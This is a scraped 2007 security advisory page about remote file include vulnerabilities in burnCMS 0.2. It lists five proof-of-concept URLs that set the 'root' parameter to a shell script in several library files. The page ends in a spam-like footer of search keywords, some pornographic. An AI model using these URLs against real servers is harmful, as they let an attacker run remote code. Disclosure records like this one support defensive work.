about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , BurnCMS Root Parameter Multiple Remote File Include Vulnerabilities


Title BurnCMS Root Parameter Multiple Remote File Include Vulnerabilities
Published 2007-04-27-12:00AM
Updated 2007-04-30-06:20PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  GolD_M is credited with the discovery of these vulnerabilities.
Vulnerable  Burnstone burnCMS 0.2
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/lib/authuser.php?root=Shell
http://www.example.com/[path]/lib/misc.php?root=Shell
http://www.example.com/[path]/lib/connect.php?root=Shell
http://www.example.com/[path]/lib/db/mysql.class.php?root=Shell
http://www.example.com/[path]/lib/db/postgres.class.php?root=Shell
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:04:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Vidio porn Gadis tela mahshar.co 2...n.com/ WWWSEXCOM all cartoo PURE-FTPd Azrael guest+book sonali ben securityim www.89coms www.ltdts. Wwwtamilse free xxxt ip+board+2 news for C www.bj23.c 2...n.com/ news for c foto bugil www.milta1 2...n.com/ sexxmax.co tftpd Www.youtub redtube.co narutox 2...n.com/ HOTSEXASIA Www.youtub sxsey narutox Nayanthara 2.6.19 loc 2...n.com/ dedicated dinarkan news for c news for c SUMIT Sexyviedo, sexygirls+ 2...n.com/ Casino roy 2...n.com/ www.rdczj. www.tamila 2...n.com/ 2...n.com/